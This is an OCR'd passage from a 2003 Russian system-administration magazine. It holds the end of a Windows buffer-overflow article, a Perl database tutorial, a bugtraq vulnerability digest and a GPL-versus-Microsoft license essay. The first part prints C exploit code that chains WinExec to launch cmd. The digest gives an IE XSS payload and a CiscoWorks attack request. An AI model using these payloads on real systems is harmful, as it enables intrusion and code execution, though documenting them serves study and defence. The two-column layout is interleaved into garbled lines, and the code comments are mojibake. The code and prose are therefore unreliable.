char pointer_to_cmd[8]="\x80\xfa\x12\x00";
void vuln_func(char *stroka) // Çàïîëíÿåì ñòðîêó ìóñîðîì (nop'û)
{ memset(garbage,'\x90',256);
// "cmd "
// áóôåð strcat(buffer,"cmd ");
char buffer[256];
// "cmd "+nop'û
strcat(buffer,garbage);
// ôóíêöèÿ â ðåçóëüòàòå âûçûâàþùàÿ ïåðåïîëíåíèå áóôåðà // "cmd "+nop'û+WinExec
lstrcpyA(buffer,stroka);
strcat(buffer,r_address1);
// "cmd "+nop'û+WinExec+ExitProcess
} strcat(buffer,r_address2);
void main (int argc, char *argv[]) // "cmd "+nop'û+WinExec+ExitProcess+....
strcat(buffer,pointer_to_cmd);
{
// âûçîâ óÿçâèìîé ôóíêöèè
vuln_func(argv[1]); strcpy(garbage,"BUG.EXE ");
strcat(garbage,buffer);
printf("Parameter is : %s",argv[1]);
} //"BUG.EXE "+"cmd "+nop'û+WinExec+ExitProcess+point_cmd
WinExec(buffer,1);
Откомпилируем её и выясним, что эта программа де- }
лает. Если её запустить без параметров, то она выведет
следующее: Как вы могли убедиться, для реализации данной ата-
ки не нужно глубокое знание ассемблера для построения
Parameter is : 0(null) shell-кода. Она гораздо легче реализуется, чем традици-
онное переполнение буфера. Данный вид атаки на пере-
Запустим её следующим образом: полнение буфера гораздо более прогрессивный, но су-
ществует некоторая сложность построения удалённых эк-
c:\x-files\bug.exe aaaaaaa сплоитов данного типа.
По-моему, данная атака представляет собой второе
Тогда данная программа выведет: дыхание эксплоитов, ориентированных на переполнение
буфера.
Parameter is : aaaaaaa Для борьбы с атаками данного вида системные адми-
нистраторы должны с большим вниманием следить за
При «aaaaa....aaaa» в количестве больше чем 256 бу- обновлением программного обеспечения.
дет происходить переполнение буфера. При написании статьи использовались материалы:
Теперь, когда у нас есть уязвимая программа, мы мо- 1. Non-stack Based Exploitation of Buffer Overrun
жем реализовать эксплоит для неё, который будет дей- Vulnerabilities on Windows NT/2000/XP by David Litchfield
ствовать по описанному выше принципу. (david@ngssoftware.com).

72
программирование

РАБОТА С БАЗАМИ
ДАННЫХ НА PERL

ВЛАДИСЛАВ ГОШКО
74
 программирование
В наше время базы данных широко используются в раз- $$h{$name}=[@values];
}else{
ных сферах человеческой жизни. Самые простые базы $vals = uri_unescape($vals);
данных – это просто файлы определенной структуры, а $$h{$name}=$vals;
}
сложные – это файлы, имеющие свой формат данных и, }
естественно, определенную структуру. В данной статье я close(DB);
# çàïèñûâàåì â ãëîáàëüíûé õåø àññîöèàöèþ ññûëêè íà õåø
рассмотрю работу с базами данных на языке программи- # ñ îòêðûòûì ôàéëîì
рования Perl. Для удобства пойдем от маленького к боль- $g{$h}=$file;
}
шому. Для начала давайте рассмотрим обычный файл как
базу данных, т.е. обычный файл можно представить как sub ñlosedb{
my($h)=@_;
определенно сформатированый текст. Файл будет отфор- my($key,$val,$fn);
матирован следующим образом: # ïî èìåíè õåøà ïîëó÷àåì èìÿ ôàéëà
$fn = $g{$h};
local(*DB);
Name1|Value1#Value2#Value3#...#ValueN # âûõîäèì èç ôóíêöèè, åñëè ôàéëà íå ñóùåñòâóåò
Name2|Value1#Value2#Value3#...#ValueN return if !(-e $fn);
Name3|Value1#Value2#Value3#...#ValueN open(DB,">$fn") or return 0;
... # çàìûêàåì ôàéë
NameN|Value1#Value2#Value3#...#ValueN # (ìîíîïîëüíàÿ áëîêèðîâêà – äëÿ çàïèñè)
flock(DB,2);
Почему разделителями я выбрал именно «|» и «#»? while(($key,$val) = each %$h){
# îáðàòíî ñîçäàåì ôîðìàò, ïåðåâîäÿ íåáåçîïàñíûå
Потому что они не являются безопасными символами (из # ñèìâîëû â ôîðìàò %XX
RFC 2396). По той же причине можно было выбрать раз- print DB uri_escape($key)."|";
if(ref $val){
делителями любой символ, кроме латинских букв, цифр, for(0..$#$val){
и вот этих: $$val[$_]=uri_escape($$val[$_]);
}
print DB join "#",@$val;
";", "/", "?", ":", "@", "&", "=", "+", "$", ",", }else{
"-", "_", ".", "!", "~", "*", "'", "(", ")" $val=uri_escape($val);
print DB $val;
Эти разделители (кроме вышеописанных символов) }
print DB "\n";
могут использоваться в значениях или в именах пере- }
менных, только нужно будет использовать модуль close(DB);
}
URI::Escape, для того чтобы переменные с этими раз- 1;
делителями не испортили структуру. Специально для
работы с нашими базами данных создадим модуль Если вам нужно открывать файл с определенными
simple_db.pm. Итак, начнем: правами, то в функциях opendb() и closedb() нужно про-
сто заменить open на sysopen по следующему формату:
#!/usr/bin/perl sysopen FILEHANDLE, FILENAME, MODE, PERMS; и все.
# ñîçäàåì ïàêåò Использование довольно простое, возьмем какой-нибудь
package simple_db; файл test.pl. В этой же директории должен лежать и мо-
use Exporter; дуль simple_db.pm. Вот test.pl:
# êàê è ãîâîðèëîñü, èñïîëüçóåì ìîäóëü äëÿ ïåðåâîäà íåáåçîïàñíûõ
# ñèìâîëîâ â ôîðìàò %XX #!/usr/bin/perl
use URI::Escape;
@ISA=("Exporter"); use simple_db;
@EXPORT=qw(&opendb &closedb %g); # îòêðûâàåì ôàéë test.db è àññîöèèðóåì ñ íèì õåø %h,
# ýêñïîðòèðóåì èñïîëüçóåìûå ôóíêöèè, à òàêæå õåø %g, äëÿ òîãî
# ÷òîáû ôóíêöèÿ çíàëà, â êàêîé ôàéë çàïèñûâàòü èçìåíåíèÿ # èíà÷å óìèðàåì
opendb(\%h,"test.db") or die $!;
# õåøà, ââîäèìîãî â àðãóìåíòàõ # äîáàâëÿåì çíà÷åíèÿ â õåø
sub opendb{ $h{'supa|var'}=["special#","tes#t"];
# òàêæå ëåãêî ìîæíî äîáàâèòü ìàññèâ
my($h,$file)=@_; @tmp = ("array","tester");
my($name,$vals,@values);
local(*DB); # äîáàâèëè ...
$h{'arr'}=\@tmp;
open(DB,$file) or return 0; # èëè äîáàâëÿåì ìàññèâ òàê
# áëîêèðóåì ôàéë íà òîò ñëó÷àé, åñëè âî âðåìÿ ÷òåíèÿ
# êòî-òî çàõî÷åò èçìåíèòü ôàéë (ñîâìåñòíàÿ áëîêèðîâêà – $h{'arr2'}=["some","vars"];
closedb(\%h) or die $!;
# äëÿ ÷òåíèÿ)
flock(DB,1);
while(<DB>){
chomp; Данным образом будет создан файл test.db в текущей
($name,$vals)=split(/\|/,$_,2); директории. С переменной «supa|var» и значениями
next if !$name;
$name = uri_unescape($name); «speacial#» и «tes#t», и т. д. Я специально использовал
@values = split(/#/,$vals); небезопасные символы, а со второй и третьей перемен-
# åñëè çíà÷åíèé ìíîãî, ñîçäàåì àíîíèìíûé ìàññèâ,
# èíà÷å ïðîñòî ïðèñâàèâàåì îäíî çíà÷åíèå ной все в порядке – там нет небезопасных символов...
if($#values){ А теперь давайте посмотрим, что записано в файле
for(0..$#values){
# ïåðåâîäèì ñèìâîëû èç %XX-ôîðìàòà test.db:
# â íîðìàëüíûé âèä
$values[$_]=uri_unescape ↵ supa%7Cvar|special%23#tes%23t
($values[$_]); arr|array#tester
}
arr2|some#vars

№9(10), сентябрь 2003 75

 программирование
Т.е. эти символы не помешали нашей структуре фай- # óäàëÿåì êàêîé-íèáóäü êëþ÷ èç áàçû
delete $HASH{SOME_KEY};
ла, они всего лишь были переведены в %XX-формат. А dbmclose(%HASH);
теперь просмотрим всю базу:
Также в начале программы можно добавить: use
#!/usr/bin/perl NDBM_File; или use SDBM_File; или use GDBM_File; или
use simple_db; use DB_File; – данные модули просто переопределяют
стандартный вариант, с которым был построен Perl. Есть
opendb(\%h,"test.db") or die $!;
while(($key,$val) = each %h){ также другой способ открытия базы данных – tie и untie.
print $key." = "; Делается это так:
if(ref $val){
# çäåñü, åñëè çíà÷åíèå ïåðåìåííîé ññûëêà íà ìàññèâ
print join " ; ",@$val; #!/usr/bin/perl
}else{
print $val; use DB_File;
} # çäåñü ýòî îáÿçàòåëüíî, ò.ê. â ôóíêöèè tie() ìû çàäàåì ìîäóëü
print "\n"; use Fcntl;
}
closedb(\%h) or die $!; tie(%HASH,"DB_File",$FILENAME,O_RDWR|O_CREAT, 0666) or ↵
die "Can't open $FILENAME: $!\n";
# âñå òå æå ìàíèïóëÿöèè ñ õåøåì, êîòîðûå îïèñûâàëèñü âûøå
При выводе база будет выглядеть так: # ...
# à ïîòîì
untie(%HASH);
supa|var = special# ; tes#t
arr = array ; tester
arr2 = some ; vars Очищаются базы так же, как и в моем примере, т.к. я
свой пример делал по подобию этих баз. Но так же, как и
Очищаем базу, просто очищая хеш, т.е. %h=(), или мой пример, данные базы не могут хранить сложные
можно просто удалить файл следующим образом: структуры. Для этого требуется модуль DB_File и модуль
MLDBM. Модуль MLDBM может хранить в хеше более
unlink "test.db" or die $!; сложные структуры, чем просто числа и скаляры. Если
его у ваc нет, то вы можете его скачать из Интернета:
А при открытии базы открыть файл в режиме созда- запускаете программу ppm из дистрибутива Perl. И пи-
ния, т.е. перед opendb() сделать следующее: шите: «install MLDBM» – все должно пройти успешно. Ис-
пользование вот такое:
# $filename - â äàííîì ñëó÷àå èìÿ íàøåãî ôàéëà
if(!(-e "$filename")){ #!/usr/bin/perl
open(FILE,">$filename") or die $!;
close(FILE);
} use MLDBM 'DB_File';
use Fcntl; # äëÿ O_RDWR, O_CREAT è ò.ä.
Но эта база не может претендовать на большую ско- tie(%h, "MLDBM", "glob.db", O_RDWR|O_CREAT, 0666) or ↵
рость и большие размеры и, как вы уже успели заме- die "Couldn't tie DB_File $users: $!; aborting";
$usr{synthetic}->{password}="matrix reloaded";
тить, в ней не могут быть созданы сложные структуры. $h{users}=\%usr;
Данная база данных вполне подойдет для небольших untie %h;
объемов информации, например, для небольших сайтов
или веб-сервисов. С помощью классов можно создать Таким образом была создана база данных glob.db, в
свою вполне приличную базу данных. А теперь давайте которой есть ключ «users», в котором есть пользователь
расмотрим другие базы данных. Начнем с портирован- «synthetic» с еще одним вложенным хешем, в котором есть
ной в вашу систему базу данных (их может быть несколь- ключ «password» со значением «matrix reloaded». Такая
ко). Функция dbmopen() довольна стара и поэтому по- структура очень удобна и легко запрашиваема. Далее
зволяет использовать лишь ту библиотеку DBM, c кото- посмотрим, как мы проверяем то, что создали:
рой был построен Perl. Но по ходу статьи рассмотрим и
более новые методы. #!/usr/bin/perl
Вот пример с dbmopen(): use MLDBM 'DB_File';
use Fcntl; # äëÿ O_RDWR, O_CREAT è ò. ä.
#!/usr/bin/perl
$access=0;
tie(%h,"MLDBM","glod.db",O_RDWR|O_CREAT,0666) or ↵
use Fcntl; die "Couldn't tie DB_File $users: $!; aborting";
# ñïåöèàëüíî äëÿ òàêèõ ïåðåìåííûõ, êàê O_RDWR, O_CREAT
# O_RDWR - ïðàâà: ÷òåíèå, çàïèñü while(($key,$val) = each %h){
if($key eq "users"){
# O_CREAT - ñîçäàòü ôàéë, åñëè îí íå ñóùåñòâóåò if($val->{synthetic}->{password} eq ↵
dbmopen(%HASH,$FILENAME,O_RDWR|O_CREAT, 0666) or die ↵ "matrix reloaded"){
$access=1;last;
"Cant open $FILENAME: $!\n"; # åñëè âñå ïðàâèëüíî, çàâåðøàåì öèêë
# çàíîñèì äàííûå â áàçó äàííûõ
$HASH{KEY}="VALUE"; }
}
# ïðîâåðÿåì, ñóùåñòâóåò ëè êëþ÷ }
if(exists $HASH{KEY}){
# ÷òî-òî äåëàåì ñ èíôîðìàöèåé, ïîëó÷åííîé èç áàçû äàííûõ untie(%h);
if($access){
$info = $HASH{KEY}; print "Matrix has you...";
}
}else{

76
 программирование
print "Follow the white rabbit"; # RaiseError => 1 - ñîîáùàòü îá îøèáêàõ
} $dbh = DBI->connect($conn, $user, $password, ↵
{RaiseError => 1});
С удалением нужно немного по-другому, через вре- # çàäàëè íàçâàíèå òýéáëà - äëÿ äàëüíåéøåãî èñïîëüçîâàíèÿ
$table = "users";
менный хеш: # ñîçäàåì òýéáë "users"
$query = "CREATE TABLE .$table(username char(16) ↵
tie(%h,"MLDBM","glob.db",O_RDWR|O_CREAT,0666) or ↵ not null,pass char(16) not null)";
die "Couldn't tie DB_File $users: $!; aborting"; # ñîçäàëè
%tmp=%h; $dbh->do($query);
delete $tmp{users}->{'somebody'}; # îòñîåäèíèëñü
%h=%tmp; $dbh->disconnect();
untie %h;
Не особо сложными манипуляциями добавляем дан-
Добавлять тоже через временный хеш: ные в тэйбл:

tie(%h,"MLDBM","glob.db",O_RDWR|O_CREAT,0666) or ↵ # âñÿ ïðåäûäóùàÿ èíèöèàëèçàöèÿ

die "Couldn't tie DB_File $users: $!; aborting"; $query = sprintf("INSERT INTO .$table (username, pass) ↵
%tmp=%h; VALUES ('%s', '%s')", $login, $pass);
$tmp{users}->{'morpheus'}->{password}='zion'; # âûïîëíèëè...
%h=%tmp; $dbh->do($query);
untie %h; # è ò. ä.

И в моем примере, и в других базах используется ра- Выбираем из базы:

бота с хешами, поэтому давайте рассмотрим несколько
примеров работы с хешами... # âñÿ ïðåäûäóùàÿ èíèöèàëèçàöèÿ.
# ñîçäàåì çàïðîñ ê áàçå è âûáèðàåì âñå èç òýéáëà users

Сортировка ключей хеша по алфавиту: $sth = $dbh->prepare("select * from .users");
# âûïîëíèëè
foreach $key (sort keys %unsorted){ $sth->execute();
$val = $unsorted{$key}; while($row = $sth->fetchrow_arrayref()){
# â äàííîì ñëó÷àå:
# çäåñü ïåðåáîðêà êëþ÷åé õåøà ïî àëôàâèòó # $row->[0] - ëîãèí (username)
# äåëàåì ÷òî-òî c $key è $val
} # $row->[1] - ïàðîëü (pass)
print $row->[0]." ".$row->[1];
}

Сортировка по ассоциированным значениям: # îáÿçàòåëüíî (!) ãîâîðèì, ÷òî çàâåðøèëè
$sth->finish();
foreach $key (sort {$unsorted{$a} cmp $unsorted{$b} } ↵
keys %unsorted){
$val = $unsoreted{$key}; Удаляем тэйбл, если он существует:
# ÷òî-òî äåëàåì ñ $key è $val...
} # âñÿ ïðåäûäóùàÿ èíèöèàëèçàöèÿ
$query = "DROP TABLE IF EXISTS .$table";

Сортировка по длине значений (почти также, как и про- # âûïîëíèëè...
сто по значениям): $dbh->do($query);
# è ò.ä.
foreach $key (sort {length($unsorted{$a}) ↵ Вот, собственно, и все, в данной статье я не стал осо-
<=> length($unsorted{$b}) } keys %unsorted){
$val = $unsoreted{$key}; бенно глубоко рассматривать работу с базами SQL, пото-
# ÷òî-òî äåëàåì ñ $key è $val... му как это довольно большая тема и требует отдельной
}
статьи (если не книжки). Удачи в создании систем управ-
Дальше рассмотрим небольшие примеры работы с ления базами данных!
базами данных MySQL, при помощи модуля DBI и драй-
вера для работы с MySQL – DBD::mysql. Эти модули так-
же можно установить через ppm. А теперь посмотрим при-
мер работы с MySQL:

#!/usr/bin/perl

use DBI;
# íàñòðîéêè SQL ñåðâåðà #####################################
$user = "synthetic"; # ëîãèí è
$password = "test"; # ïàðîëü äëÿ äîñòóïà ê ñåðâåðó
$host = "localhost"; # àäðåñ SQL-ñåðâåðà
$db = "site"; # áàçà äàííûõ, ñ êîòîðîé ñîåäèíÿåìñÿ
$port = 3306; # ïîðò (âçÿò ïî óìîë÷àíèþ)
$driver = "mysql"; # ýòî äðàéâåð äëÿ áàçû äàííûõ, ò.å.
# âû ìîæåòå óêàçàòü äðàéâåð ñâîåé
# áàçû è ñïîêîéíî ñîåäèíÿòñÿ ñ íåé
# (åñòåñòâåííî çíàÿ åå ñåìàíòèêó)
##########################################################
# äàííûå - ïðîñòî äëÿ ïðîâåðêè
$login = "Vlad";
$pass = "isitreal";

$conn = "DBI:$driver:database=$db;host=$host;port=$port";

№9(10), сентябрь 2003 77

 bugtraq
Удаленный доступ к системе
в CiscoWorks 2000 Common Management
Foundation
Уязвимость обнаружена в CiscoWorks 2000 Common
Management Foundation. Удаленный пользователь может
получить поднятые привилегии на системе. Удаленный ав-
торизованный пользователь может выполнить произволь-
ный код на системе.
CSCdy33916: В конфигурации по умолчанию включе-
на учетная запись гостя с пустым паролем. Удаленный
пользователь может получить доступ к учетной записи
гостя. Используя учетную запись гостя, удаленный пользо-
ватель может представить специально обработанный
POST-запрос, чтобы получить привилегии администрато-
ра. Например, удаленный пользователь может получить
информацию о всех пользователях системы.
CSCea15281: Cisco сообщает, что удаленный автори-
зованный пользователь может представить специально
обработанный URL, чтобы выполнить команды на систе-
ме с привилегиями «casuser» учетной записи. Удаленный
пользователь может, например, просмотреть конфигура-
цию устройства, хранящуюся в базе данных в локальном
архиве. Пример:
POST /CSCOnm/servlet/ ↵
com.cisco.nm.cmf.servlet.CsAuthServlet HTTP/1.0
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 10.10.10.1:1741
Content-Length: 114
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: jrunsessionid=1057059156201223367
Уязвимость обнаружена в CiscoWorks 2000 2.1 и бо-
лее ранних версиях.
Межсайтовый скриптинг
в Microsoft Internet Explorer
Межсайтовый скриптинг обнаружен в Microsoft Internet
Explorer в about:blank странице. Атакующий может выпол-
нить произвольный код сценария в браузере целевого
пользователя. Пример:
about:blank%20< script>alert('8-D uhh !');</script>
about:blank%20< iframe src="about:blank%20<h1>;- )"></iframe>
about:blank%20< h1>XSS is behind you...</h1>
Код будет выполнен в контексте локальной зоны бе-
зопасности.
Уязвимость обнаружена в Internet Explorer version
6.0.2600.x (without SP1), Internet Explorer version 5.0.x,
Internet Explorer version 4.x, Internet Explorer version 3.x.
Internet Explorer version 6.0.2600.x c SP1 неуязвим к об-
наруженной проблеме.
78
Удаленное выполнение произвольного
кода в Network Associates McAfee ePolicy
Orchestrator
Несколько уязвимостей обнаружено в Network Associates
McAfee ePolicy Orchestrator. Удаленный пользователь мо-
жет выполнить произвольный код с System-привилегиями.
@stake обнаружил три уязвимости, две затрагивают
ePolicy Orchestrator (ePO)-сервер и одна ePO-клиент. Обе
программы по умолчанию установлены с системными
привилегиями.
На версиях 2.x и 3.0 ePO-сервера удаленный пользо-
ватель может получить доступ к MSDE system administrator
учетной записи, используя следующие шаги: удаленный
пользователь может представить специально обработан-
ный HTTP-запрос к серверу, чтобы получить конфигура-
ционный файл сервера, который содержит кодированный
пароль MSDE администратора (CVE: CAN-2003-0148). Па-
роль зашифрован с секретным ключом, который хранит-
ся в DDL на системе, позволяя удаленному пользователю
дешифровать зашифрованный пароль и получить доступ
к паролю MSDE system administrator. В конфигурации по
умолчанию удаленный пользователь может получить до-
ступ к xp__cmdshell, чтобы выполнить произвольные ко-
манды операционной системы с System-привилегиями.
Также сообщается, что версии 2.х ePO-сервера содер-
жат уязвимость форматной строки в обработке парамет-
ра ComputerList. Удаленный пользователь может предста-
вить специально обработанный HTTP POST-запрос к сер-
веру, чтобы выполнить произвольный код (CVE: CAN-2003-
0616).
Также сообщается, что удаленный пользователь мо-
жет представить специально обработанный HTTP-запрос
к версии 3.0 ePO-агента, чтобы просматривать произволь-
ные файлы на системе. (CVE: CAN-2003-0610).
Уязвимость обнаружена в McAfee ePolicy Orchestrator
2.0, 2.5, 2.5.1, and 3.0.
Для устранения уязвимости установите соответству-
ющее обновление, которое можно скачать отсюда: http://
www.networkassociates.com/us/downloads/updates/
hotfixes.asp
Доступ к произвольным частям памяти
веб-сервера через PHP-функцию DLOpen()
Уязвимость обнаружена в PHP-функции DLOpen. Атаку-
ющий может заставить процесс Apache выполнить про-
извольный код.
Используя функцию dlopen() в PHP, атакующий может
получить доступ к памяти процесса Apache (или другого
используемого веб-сервера). Первый способ записывает
дамп процесса в /tmp (работает в Apache 1.x и Apache 2.x),
а второй способ моделирует дефейс (работает на в Apache
1.x, но из-за обработки кода возврата не работает на
Apache 2.x).
Уязвимость обнаружена в PHP 4.0-4.3.1.
Составил Александр Антипов
образование

СКУПОЙ ПЛАТИТ ДВАЖДЫ,

А УМНЫЙ ИСПОЛЬЗУЕТ
GNU PUBLIC LICENSE
Да ну, я микрософт согну и гайки закручу!!!
(Microsoft vs GNU Public License)

Общаясь со многими людьми, я заметил, что многие не знают о тех подводных камнях, которые
заложены в их любимых «окошках», а подчас и не догадываются, что существует альтернатива
выбора и что на серверах используется что-то отличное от их представлений. Этот факт и подвиг
меня написать эту статью для просвещения масс в тех моментах, на которые у них просто
физически не хватает времени. Ведь не секрет, что во время установки почти никто не читает
лицензионных соглашений. Я буду считать статью удавшейся, если вы, читатели, сможете
не только посмеяться над написанным, где-то над собой, но и задуматься.

ПАВЕЛ ЗАКЛЯКОВ
80

За последнее время наблюдается противостояние двух
сторон: закрытых продуктов Microsoft (и других компаний)
и открытых продуктов, распространяемых по лицензии
GNU. Нельзя сказать, чтобы это противостояние было рав-
ным. Несмотря на всю комичность ситуации, на мой
взгляд, это сражение не стоит на месте и люди постоянно
выбирают не ту сторону.
Связано это с особенностями человеческой психоло-
гии, и выбор отнюдь не основывается на разумности и
дальновидных взглядах. Скорее ситуацию можно описать
известной фразой «После нас хоть потоп».
«Это происходит оттого, что все человеческие дела
делаются людьми, которые имели и всегда будут иметь
одни и те же страсти, и поэтому они неизбежно должны
давать одинаковые результаты». [1].
Желание «откупиться от проблем» и навязывания нам
такого образа жизни Америкой как правильного приво-
дит к тому, что люди готовы платить другим фирмам, ко-
торые будут решать за них их проблемы. В то время как
фирмы, получающие деньги, увидев эту зависимость, за-
хотят получать деньги постоянно, для чего будут выходить
в свет обновления и различные не очень нужные измене-
ния. Они даже попытаются установить монополию на свои
продукты, чтобы завоевать максимум пользователей и
чтобы их продукты стояли на большинстве компьютеров.
«Стремление к завоеваниям – вещь, конечно, очень
естественная и обыкновенная; когда люди делают для это-
го всё, что могут, их всегда будут хвалить, а не осуждать;
но когда у них нет на это сил, а они хотят завоевывать во
что бы то ни стало, то это уже ошибка, которую надо осу-
дить». [1].
Сложно сказать, есть ли у Miscrosoft силы на завоева-
ния всего мира, но, видимо, нет, так как до сих пор встре-
чаются другие операционные системы и продукты других
фирм. Так что моя задача осудить их позицию в этой ста-
тье и призвать людей, читающих и мыслящих, к правиль-
ному выбору. Я отнюдь не хочу неаргументированных вос-
клицаний вроде «Microsoft suxx», а постараюсь делать вы-
воды обоснованно, чтобы людям стало смешно и тошно
оттого, что они не замечали всего описанного ниже ра-
нее.
Для сравнения позиций я бы хотел взять две лицензии
и прокомментировать существенные моменты. Первая ли-
цензия будет GNU Public License в русском переводе, вто-
рая может быть любой из семейства Windows. Я рассмот-
рел несколько вариантов перевода GNU Public License [3]:
Гинзбурга В.Р. [2], Тяпкиной Елены [4] и Середы Сергея
[5]. Мой выбор пал на перевод Елены Тяпкиной. Со сто-
роны Microsoft я решил выбрать лицензионное соглаше-
ние Microsoft Windows XP Home Edition. [7].
Для простоты изложения я буду говорить, что «Microsoft
или GNU пишет», подразумевая соответствующие выше
этим словам лицензии.
Итак, мы с первых строчек лицензий видим кнуты и
пряники.
Microsoft: «Настоящее лицензионное соглашение (да-
лее «лицензионное соглашение») является юридическим
соглашением».
GNU: «Большинство лицензий на программное обес-
№9(10), сентябрь 2003
образование
печение лишаeт вас права распространять и вносить из-
менения в это программное обеспечение. Стандартная
Общественная Лицензия GNU, напротив, разработана с
целью гарантировать вам право совместно использовать
и вносить изменения в свободное программное обеспе-
чение, т.е. обеспечить свободный доступ к программно-
му обеспечению для всех пользователей».
Сопоставлять предложения одно против другого
сложно в силу разности лицензий, поэтому проще вна-
чале описать все минусы и плюсы одной лицензии, а
потом то же самое сделать для другой лицензии. Тем
самым предоставив читателю информацию для выбора
и размышления.
Microsoft: «... лицензионное соглашение ... относитель-
но ... программного продукта ... который включает в себя
... любые печатные материалы, любую «встроенную» или
«электронную» документацию и службы в Интернете».
Мол, всё, что напечатали, всё включается. Чёткой гра-
ни я не вижу, что включать, а что нет, ну да ладно с доку-
ментацией, а как быть со службами в Интернете? Они вы-
ложат у себя на сайте какую-то часть в виде CGI или как-
то ещё, с которой будет взаимодействовать мой продукт,
а я и в глаза не буду знать, что их продукт делает. Но
никого этот пункт в лицензии не пугает.
Единственный плюс дальше, что если я не согласен, то:
Microsoft: «Не устанавливайте и не используйте дан-
ный продукт; вы можете вернуть его лицу, у которого вы
приобрели продукт, и получить обратно уплаченные вами
деньги».
Про копирование ничего не сказано. Возможно, этот
момент защищается другими законами и актами.
Однако если я поставил продукт и/или попользовал-
ся, то вроде как я уже вернуть его не могу. Так что толку
в этой фразе никакого нет. Ну разве что, если у меня ко-
робочная версия продукта, то я могу посмотреть, что за
макулатуру понапихали мне в неё и отказаться, если меня
она не устроила. Даже могу полюбоваться цветом ком-
пакт-диска.
Microsoft: «Запрещается использовать продукт одно-
временно более чем 1 (одним) процессором одной рабо-
чей станции».
А как мне быть, если я запускаю продукт под эмуля-
цией? Что понимать под рабочей станцией? Всё, что
не в корпусах под стойку? Сервер можно и из ноутбука
сделать.
Microsoft: «К рабочей станции разрешается подклю-
чать не более 5 (пяти) компьютеров или других электрон-
ных устройств (далее «устройство») для использования
служб данного продукта, причем исключительно для дос-
тупа к файловым службам, службам печати, службам IIS,
а также к службам удаленного доступа (включая общий
доступ к подключению и телефонные службы). Макси-
мальное количество подключений, равное пяти, включа-
ет любые косвенные подключения, производимые через
«мультиплексирующее» или иное программное или аппа-
ратное обеспечение, позволяющее осуществлять коллек-
тивный доступ или поочередные подключения».
В общем, хороший веб-сервер я сделать не могу, так
как не более 5 подключений к IIS. Разве что для тестиро-
81
 образование
вания вводят возможность установки «урезанного» веб-
сервера. Файл-сервер для домашней сети тоже нельзя,
вдруг у вас через сетевое окружение 6 соседей будут что-
то скачивать.
Microsoft: «Обязательная активизация. ... Активиза-
ция продукта может быть выполнена через Интернет или
по телефону (телефонные переговоры оплачиваются
вами). В случае изменения аппаратного обеспечения ком-
пьютера или продукта может потребоваться повторная ак-
тивизация продукта».
Понимаем это так: обязательно отдаём сведения фир-
ме Microsoft, среди которых размеры нашей памяти, про-
изводительность и другие параметры, чтобы та, увидев,
что если массово аппаратные возможности превосходят
программные и продукт не дай Бог работает быстро, мог-
ла бы добавить нужные, на её взгляд, для пользователя
функции, чтобы привнести соответствие. Несомненно, что
собирание различных сведений может рассматриваться
как открытая форма шпионажа против стран, в которые
поставляются продукты.
Microsoft: «Лицензия на продукт неделима и не до-
пускает одновременного её использования на нескольких
рабочих станциях».
Если у вас компьютер дома, на работе, на даче и на
второй квартире, у бабушки и у дедушки, у сестры и бра-
та, то вы купите столько лицензий, в скольких местах вы
будете ставить продукт и пользоваться им. Либо носите
свой компьютер с собой. Это всё равно что если вашу
машину страхуют на стоянке или в гараже одной страхов-
кой, при поездке на дачу – другой, поездке на работу –
третьей, в булочную – четвёртой и т. д., ведь стоянка у
булочной более опасная, чем закрытый гараж.
Microsoft: «Сохранение прав. Все права, которые не
предоставлены явно настоящим лицензионным соглаше-
нием, сохраняются за корпорацией Майкрософт».
Забудьте про свои права. У вас есть только право пла-
тить деньги и покупать лицензии за сервис как есть и за
то, что вам ничего не обещают, но об этом ниже.
Microsoft: «Обновления. Если программный продукт
является обновлением, для его использования вам необ-
ходимо иметь соответствующую лицензию на продукт,
указанный корпорацией Майкрософт как подпадающий
под предложение об обновлении. После обновления зап-
рещается использовать продукт, являющийся основани-
ем вашего права на обновление».
Вы хотите использовать два браузера: старый для
обычного просмотра страниц, так как он меньше и быс-
трее грузится, а новый – когда у вас что-то не отобража-
ется? У вас так не получится. Определитесь чётко! Либо
новая версия, либо старая. А то, что в новом продукте
вас может что-то не устроить, то у вас есть право не
использовать новый продукт.
Microsoft: «Дополнительное программное обеспечение
и службы. Настоящее лицензионное соглашение распро-
страняется также на предназначенные для продукта об-
новления, добавления, дополнительные компоненты и
компоненты служб в Интернете».
Если вы хотите создать доверенный продукт и защи-
тить свой компьютер по какому-то классу безопасности
82
[14,15,16], то это будет затруднительно в случае его под-
ключения к сети Интернет, так как вы же не можете про-
верить службы в Интернете, которые могут меняться по
желанию Microsoft. Но это не самое страшное, дальше ещё
интереснее.
Microsoft: «Корпорация Майкрософт оставляет за со-
бой право прекратить работу любой службы в Интернете,
предоставленной или доступной вам посредством исполь-
зования продукта».
Хотите за бесплатно DoS-атаку, с которой вы согласи-
лись в этом пункте? Вам надо послать почту или сообще-
ние, а вам в ответ: «Мы подумали и решили вам не пере-
давать сообщения». Если начнутся военные действия, то
где гарантии, что не последуют массовые сбои компью-
теров? «Ирак покупал у французов истребители «Мираж»
незадолго до начала «Бури в пустыне». Когда конфликт
начался, ни один мираж не взлетел [9]». Отказали нави-
гационные приборы, система управления бортовым ору-
жием, а также связное оборудование и обычные элект-
ронные АТС, тоже, заметьте, французского производства.
В перепечатке из NewScientist [10] под заголовком «Теле-
фон-граната» [11] сообщается, что Майкл Сэйлор с кол-
легами из Калифорнийского университета в Сант-Диего
обнаружили взрывчатое свойство кремния, обработанного
нитратом гадолиния. Изготовленные из такого материа-
ла микрочипы-камикадзе способны взрываться под дей-
ствием электрического импульса, нарушая работу исполь-
зующего их оборудования связи, коммуникации, управ-
ления и т. д. Теперь любая купленная аппаратура может
оказаться заминированной, причём взрыватель навсег-
да остаётся в руках её производителя. Та же самая ситу-
ация наблюдается и с программными закладками в зак-
рытом коде ожидающими часа «X». Закладки без проблем
могут быть встроены и найти их в разумное время разум-
ными средствами может не представляться возможным.
Microsoft: «Настоящее лицензионное соглашение не
предоставляет вам никаких прав на использование вклю-
ченных в продукт компонентов пакета средств разработ-
ки Windows Media Format Software Development Kit».
В общем, если вы надумали что-то там написать и вы
программист, то вам сразу обстригут крылья, отослав ещё
к одной лицензии на английском языке. Много ли програм-
мистов делают это?
Microsoft: «Передача третьим лицам. Первоначальный
пользователь продукта имеет право единовременной пе-
редачи его другому лицу».
Вася продал свой продукт Пете, а Петя решил его по-
дарить Ане. Но, увы, поздравить Аню с днём рождения
